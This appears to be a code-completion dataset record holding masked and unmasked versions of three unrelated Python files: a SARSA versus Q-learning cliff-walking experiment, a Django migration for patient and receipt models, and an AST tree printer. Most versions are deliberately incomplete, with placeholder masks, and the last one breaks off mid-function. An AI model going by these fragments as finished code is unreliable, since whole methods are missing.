elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| from math import *
from numpy import *
from random import *
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| from math import *
from numpy import *
from random import *
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
# north, east, south, west
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
# This is the set of states, all initialised with default values
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
# make the cliff
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
# The reward function defines what reward I get for transitioning between the first and second state
def reward(s_1, s_2):
if (s_1.is_goal or s_1.is_cliff):
return 0
elif (s_2.is_goal):
return 10
elif (s_2.is_cliff):
return -100
else:
return -1
""" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the "states" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a "difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left"""
def transition(stsp, s, di, dj):
if (s.is_cliff or s.is_goal):
return s
elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0: # NORTH
return -1, 0
elif action == 1: # EAST
return 0, 1
elif action == 2: # SOUTH
return 1, 0
elif action == 3: # WEST
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 0.00001
epsilon = _epsilon
episode_rewards = []
mistakes_array = [] # array which tracks error from convergence on each step
for i in range(N_STEPS):
# select a random starting state
current_state = states[N_ROWS-1][0]
# iterate until reaching a terminal state
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)
# print(current_state, next_state, action_to_verbose(next_action), di, dj)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
'''
if (i % 100 == 0):
print(i)
'''
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([
[-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],
[-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],
[-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],
[0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],
[1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],
[0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],
])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0]))
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
# plt.show()
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
# fig, ax = plt.subplots()
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),
ha="center", va="center", color="w")
fig.tight_layout()
ax.set_title("{}; $\epsilon={}$".format(method, epsilon))
for i in range(N_ROWS):
str_ = ""
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ", "
PLOTS += 1
# plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))
# plt.show()
def display_optimal_policy(states, method, epsilon):
print("{}; ε = {}".format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys; sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
# for i, j in [(0, 3), (1, 4), (2, 5)]:
for reward in rewards:
# plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))
# plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| [
18,
19,
20,
21,
22
] |
41 | 52da8608e43b2d8dfe00f0956a1187fcf2e7b1ff | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('DHOPD', '0015_auto_20200515_0126')]
operations = [migrations.CreateModel(name='Patient_c', fields=[(
'patient_id', models.AutoField(max_length=200, primary_key=True,
serialize=False)), ('patient_fname', models.CharField(max_length=
200)), ('patient_mname', models.CharField(max_length=200)), (
'patient_lname', models.CharField(max_length=200)), (
'patient_title', models.CharField(max_length=20)), (
'patient_address', models.CharField(max_length=500)), (
'patient_town', models.CharField(max_length=200)), ('patient_phone',
models.CharField(max_length=15)), ('patient_services', models.
CharField(max_length=500)), ('patient_status', models.CharField(
max_length=2)), ('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)), (
'patient_time', models.TimeField(auto_now_add=True)), (
'patient_comment', models.CharField(max_length=200))]), migrations.
CreateModel(name='Receipt_c', fields=[('receipt_id', models.
AutoField(max_length=200, primary_key=True, serialize=False)), (
'receipt_patient', models.CharField(max_length=200)), (
'receipt_cost', models.CharField(max_length=200)), ('receipt_time',
models.TimeField(auto_now=True)), ('receipt_status', models.
CharField(default='-1', max_length=10))])]
| import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('DHOPD', '0015_auto_20200515_0126')]
operations = [migrations.CreateModel(name='Patient_c', fields=[(
'patient_id', models.AutoField(max_length=200, primary_key=True,
serialize=False)), ('patient_fname', models.CharField(max_length=
200)), ('patient_mname', models.CharField(max_length=200)), (
'patient_lname', models.CharField(max_length=200)), (
'patient_title', models.CharField(max_length=20)), (
'patient_address', models.CharField(max_length=500)), (
'patient_town', models.CharField(max_length=200)), ('patient_phone',
models.CharField(max_length=15)), ('patient_services', models.
CharField(max_length=500)), ('patient_status', models.CharField(
max_length=2)), ('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)), (
'patient_time', models.TimeField(auto_now_add=True)), (
'patient_comment', models.CharField(max_length=200))]), migrations.
CreateModel(name='Receipt_c', fields=[('receipt_id', models.
AutoField(max_length=200, primary_key=True, serialize=False)), (
'receipt_patient', models.CharField(max_length=200)), (
'receipt_cost', models.CharField(max_length=200)), ('receipt_time',
models.TimeField(auto_now=True)), ('receipt_status', models.
CharField(default='-1', max_length=10))])]
| # Generated by Django 2.2.6 on 2020-05-21 09:44
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('DHOPD', '0015_auto_20200515_0126'),
]
operations = [
migrations.CreateModel(
name='Patient_c',
fields=[
('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),
('patient_fname', models.CharField(max_length=200)),
('patient_mname', models.CharField(max_length=200)),
('patient_lname', models.CharField(max_length=200)),
('patient_title', models.CharField(max_length=20)),
('patient_address', models.CharField(max_length=500)),
('patient_town', models.CharField(max_length=200)),
('patient_phone', models.CharField(max_length=15)),
('patient_services', models.CharField(max_length=500)),
('patient_status', models.CharField(max_length=2)),
('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)),
('patient_time', models.TimeField(auto_now_add=True)),
('patient_comment', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Receipt_c',
fields=[
('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),
('receipt_patient', models.CharField(max_length=200)),
('receipt_cost', models.CharField(max_length=200)),
('receipt_time', models.TimeField(auto_now=True)),
('receipt_status', models.CharField(default='-1', max_length=10)),
],
),
]
| [
0,
1,
2,
3,
4
] |
42 | 1084478226777b9259274e053984ac34d461198d | <mask token>
class TreePrinter:
<mask token>
<mask token>
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
<mask token>
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
<mask token>
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
